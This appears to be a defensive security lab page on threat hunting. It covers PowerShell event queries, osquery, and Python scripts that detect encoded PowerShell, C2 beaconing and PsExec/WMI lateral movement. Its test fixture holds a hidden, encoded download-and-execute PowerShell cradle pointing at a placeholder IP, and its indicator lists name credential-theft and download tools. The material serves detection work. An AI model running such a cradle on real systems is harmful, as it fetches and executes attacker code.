🛡️ Blue Team / Defensive Security Lab

PRACIVO LAB
⚠️ Pracivo Security Lab — Blue team skills: log analysis, incident response, SIEM, firewall rules, IDS, threat hunting.

Threat Hunting

# Threat hunting = proactively searching for threats that evaded detection

# HYPOTHESIS-DRIVEN HUNTING
# Start with a hypothesis: "An attacker has compromised a Windows machine
# and is using LOLBins (living off the land) to avoid detection"

# Hunt 1: Suspicious PowerShell executions
# Look for: powershell.exe with encoded commands, unusual parent processes
# (4688 names the parent in "Creator Process Name"; the command line is only logged when
# "Include command line in process creation events" is enabled, otherwise use Sysmon Event ID 1)
# -EncodedCommand can be abbreviated to -e / -ec / -enc, so match the short forms too
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
  Where-Object {$_.Message -like "*powershell*" -and $_.Message -match '\s-(e|ec|en\w*)\s+[A-Za-z0-9+/=]{20,}'}
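Once the 4688 records are pulled, the interesting part is decoding the payload and deciding which hits deserve a look. The following is an added Python example (not part of the lab page) that triages constructed 4688-style records: it extracts the base64 argument of any `-e`/`-ec`/`-enc`/`-EncodedCommand` flag, decodes it as UTF-16LE (which is what powershell.exe expects), and scores the event on parent process, command-line flags and the decoded script. The sample events, indicator lists and field names are assumptions for the example, not telemetry from the page.

```python
import base64
import binascii
import re

# powershell.exe accepts -EncodedCommand and any abbreviation down to -e / -ec / -enc.
# The argument is base64 of a UTF-16LE string, so it must be decoded as utf-16-le.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})")

# Indicator lists are illustrative assumptions for this example, not a vetted ruleset
CMDLINE_INDICATORS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                      "-ep bypass", "-executionpolicy bypass")
SCRIPT_INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                     "frombase64string", "invoke-mimikatz")
# Parents that should not normally launch PowerShell on a workstation
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wmiprvse.exe",
                      "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # flag present but payload undecodable; still worth a manual look


def triage_event(evt: dict):
    """Score one 4688-style record; returns a finding or None if nothing stands out."""
    image = evt["NewProcessName"].lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return None
    cmdline = evt.get("CommandLine", "")
    parent = evt.get("ParentProcessName", "").lower().rsplit("\\", 1)[-1]
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"parent {parent}")
    flags = [k for k in CMDLINE_INDICATORS if k in cmdline.lower()]
    if flags:
        reasons.append("command line flags " + ", ".join(flags))
    script = decode_encoded_command(cmdline)
    if script is not None:
        reasons.append("encoded command")
        hits = [k for k in SCRIPT_INDICATORS if k in script.lower()]
        if hits:
            reasons.append("script contains " + ", ".join(hits))
    if not reasons:
        return None
    return {"pid": evt["NewProcessId"], "parent": parent, "reasons": reasons, "script": script}


def triage(events):
    return [f for f in map(triage_event, events) if f]


# Constructed sample records (field names follow the 4688 event data; values are made up)
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"NewProcessId": "0x1a4c",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -e {ENCODED}"},
    {"NewProcessId": "0x2b10",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"NewProcessId": "0x3c22", "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["pid"], finding["parent"], "; ".join(finding["reasons"]))
        print("  decoded:", finding["script"])
```

The first sample is flagged on three independent grounds (Office parent, hidden window plus no profile, and a decoded download cradle); the backup script launched from Explorer produces no finding, which is the kind of noise reduction a hunt query needs before results go to an analyst.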

# Hunt 2: Unusual outbound connections (C2 beaconing)
# Beacons call home on a schedule, but most implants add jitter: look for a
# source/destination pair whose inter-connection intervals cluster tightly
# (for example around 60s), not for an exact period
# Tools: Zeek (Bro) conn.log, NetworkMiner
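The interval test above can be run directly over Zeek's conn.log. The following is an added Python example (not from the lab page) that parses a constructed conn.log excerpt, groups connections by source host, destination host and port, and flags pairs whose gaps have a low MAD/median ratio, so a 60s beacon with a few seconds of jitter is caught while ordinary browsing is not. The log contents, thresholds and column subset are assumptions for the example.

```python
import statistics
from collections import defaultdict


def _constructed_conn_log():
    """Build a Zeek-style conn.log excerpt (constructed for this example, not a real capture)."""
    header = "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\torig_bytes"
    rows, n = [], 0

    def add(t, orig, resp, port, nbytes):
        nonlocal n
        rows.append(f"{t:.6f}\tC{n:04d}\t{orig}\t{50000 + n}\t{resp}\t{port}\ttcp\t{nbytes}")
        n += 1

    t = 1700000000.0
    for gap in [0, 58, 61, 60, 63, 59, 60, 62, 57, 61]:   # ~60s beacon with jitter
        t += gap
        add(t, "10.0.0.5", "203.0.113.10", 443, 312)
    t = 1700000000.0
    for gap in [0, 4, 1, 300, 2, 900, 45, 10, 1200, 3]:   # ordinary browsing
        t += gap
        add(t, "10.0.0.7", "198.51.100.20", 443, 1900)
    for t in (1700000010.0, 1700000070.0, 1700000130.0):  # too few connections to judge
        add(t, "10.0.0.5", "10.0.0.1", 53, 60)
    return "\n".join([header, *rows])


SAMPLE_CONN_LOG = _constructed_conn_log()


def parse_conn_log(text):
    """Yield one dict per record, using the #fields header for column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split("\t")))


def find_beacons(records, min_conns=6, max_dispersion=0.15):
    """Flag (src, dst, port) tuples whose connection intervals cluster tightly.

    Dispersion is MAD/median of the inter-connection gaps: robust to the few
    outliers a sleeping laptop introduces and tolerant of jitter, unlike an
    'exactly every 60s' test. Thresholds are starting points, not tuned values.
    """
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["id.orig_h"], r["id.resp_h"], r["id.resp_p"])].append(float(r["ts"]))
    findings = []
    for (orig, resp, port), times in by_pair.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        med = statistics.median(gaps)
        if med <= 0:
            continue
        dispersion = statistics.median(abs(g - med) for g in gaps) / med
        if dispersion <= max_dispersion:
            findings.append({"orig": orig, "resp": resp, "port": port, "count": len(times),
                             "interval": med, "dispersion": round(dispersion, 3)})
    return sorted(findings, key=lambda f: f["dispersion"])


if __name__ == "__main__":
    for b in find_beacons(parse_conn_log(SAMPLE_CONN_LOG)):
        print(f"{b['orig']} -> {b['resp']}:{b['port']} every ~{b['interval']:.0f}s "
              f"({b['count']} conns, dispersion {b['dispersion']})")
```

On a real conn.log you would also drop destinations inside your own ranges and known update/CDN hosts before ranking, and look at orig_bytes consistency as a second signal: beacons that only poll for tasking tend to send the same few hundred bytes each time.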

# Hunt 3: New scheduled tasks (persistence)
# Date is a string from the task XML (and is attacker-controlled), so cast it before comparing;
# Security Event ID 4698 (scheduled task created) is the more trustworthy source when audited
Get-ScheduledTask | Where-Object { $_.Date -and [datetime]$_.Date -gt (Get-Date).AddDays(-7) }
# findstr treats spaces as separate search terms; /C: keeps each phrase literal
schtasks /query /fo LIST /v | findstr /C:"TaskName" /C:"Task To Run" /C:"Run As User" /C:"Schedule Type"

# Hunt 4: Credential access indicators
# Look for handles opened on the LSASS process. 4656 is only written when Object Access
# auditing (Kernel Object) is enabled and a SACL applies, so in most environments
# Sysmon Event ID 10 (ProcessAccess) with TargetImage lsass.exe is the usable source
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4656} |
  Where-Object {$_.Message -like "*lsass.exe*"}

# Hunt 5: Lateral movement via WMI or PsExec
# 4624 with Logon Type 3 (network) from another workstation. On current Windows versions
# Properties[8] is the logon type and Properties[18] the source IP; 10.0. stands in for
# your client subnet. Matching the whole Message on "*Network*" is too loose.
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} |
  Where-Object {$_.Properties[8].Value -eq 3 -and $_.Properties[18].Value -like "10.0.*"}
# Corroborate: PsExec installs a service (System log Event ID 7045, PSEXESVC by default);
# remote WMI execution shows WmiPrvSE.exe as the parent process in 4688
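A network logon on its own is normal traffic; what makes it lateral movement is what follows it on the same host within seconds. The following is an added Python example (not the lab page's code) that correlates constructed 4624/7045/4688 records, already reduced to the fields named in the hunt above, and reports a network logon that is followed by a service install (PsExec-like) or by a process spawned under WmiPrvSE.exe (remote WMI). Record shape, hostnames, users and the 60s window are assumptions for the example.

```python
from collections import defaultdict

# Constructed records, shaped like the fields you would pull out of Get-WinEvent
# Properties for each event ID; not real telemetry.
SAMPLE_EVENTS = [
    {"id": 4624, "ts": 1000, "host": "SRV01", "logon_type": 3, "user": "svc-backup", "ip": "10.0.5.23"},
    {"id": 7045, "ts": 1004, "host": "SRV01", "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 4624, "ts": 1500, "host": "SRV01", "logon_type": 3, "user": "alice", "ip": "10.0.5.40"},
    {"id": 4688, "ts": 1502, "host": "SRV01", "user": "alice", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"id": 4624, "ts": 2000, "host": "SRV01", "logon_type": 3, "user": "bob", "ip": "10.0.5.41"},  # file share
    {"id": 4688, "ts": 2005, "host": "SRV01", "user": "bob", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 4624, "ts": 2100, "host": "SRV01", "logon_type": 2, "user": "carol", "ip": "-"},  # console logon
]


def find_lateral_movement(events, window=60):
    """Pair each network logon (4624, type 3) with follow-on events on the same host.

    A 7045 inside the window means a service was installed right after a remote
    logon (what PsExec does); a 4688 whose parent is WmiPrvSE.exe means a remote
    WMI call spawned a process. Each is reported with the logon that preceded it.
    """
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    findings = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        for i, logon in enumerate(evs):
            if logon["id"] != 4624 or logon.get("logon_type") != 3:
                continue
            for follow in evs[i + 1:]:
                if follow["ts"] - logon["ts"] > window:
                    break
                if follow["id"] == 7045:
                    what = f"service {follow['service']} installed (PsExec-like)"
                elif follow["id"] == 4688 and follow.get("parent", "").lower().endswith("\\wmiprvse.exe"):
                    what = f"WmiPrvSE.exe spawned {follow['image']} (WMI execution)"
                else:
                    continue
                findings.append({"host": host, "user": logon["user"], "source_ip": logon["ip"],
                                 "delay_s": follow["ts"] - logon["ts"], "evidence": what})
    return findings


if __name__ == "__main__":
    for f in find_lateral_movement(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['user']} from {f['source_ip']} +{f['delay_s']}s -> {f['evidence']}")
```

Bob's share access and Carol's console logon produce nothing, which is the point of correlating rather than listing every type 3 logon: the service install and the WMI-spawned shell are the events that would not appear after a benign network logon.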

# OSQUERY — cross-platform endpoint visibility
# Find all listening processes:
SELECT pid, name, address, port FROM listening_ports;
# Find files under /etc modified in the last 24h (the file table needs a path or
# directory constraint, and unix_time is a column of the time table, not a function):
SELECT path, mtime FROM file WHERE path LIKE '/etc/%' AND mtime > (SELECT unix_time - 86400 FROM time);
# Find processes with network connections:
SELECT p.name, p.pid, n.remote_address, n.remote_port FROM processes p JOIN process_open_sockets n USING (pid);

# MITRE ATT&CK framework: the catalogue of adversary TTPs that hunts and detections are mapped to
# https://attack.mitre.org
# Use ATT&CK Navigator to plan hunts and to record which techniques you already cover
# The hunts above map to: T1059.001 (PowerShell), T1071 (Application Layer Protocol, C2),
# T1053.005 (Scheduled Task), T1003.001 (LSASS Memory), T1047 (WMI), T1569.002 (Service Execution, PsExec)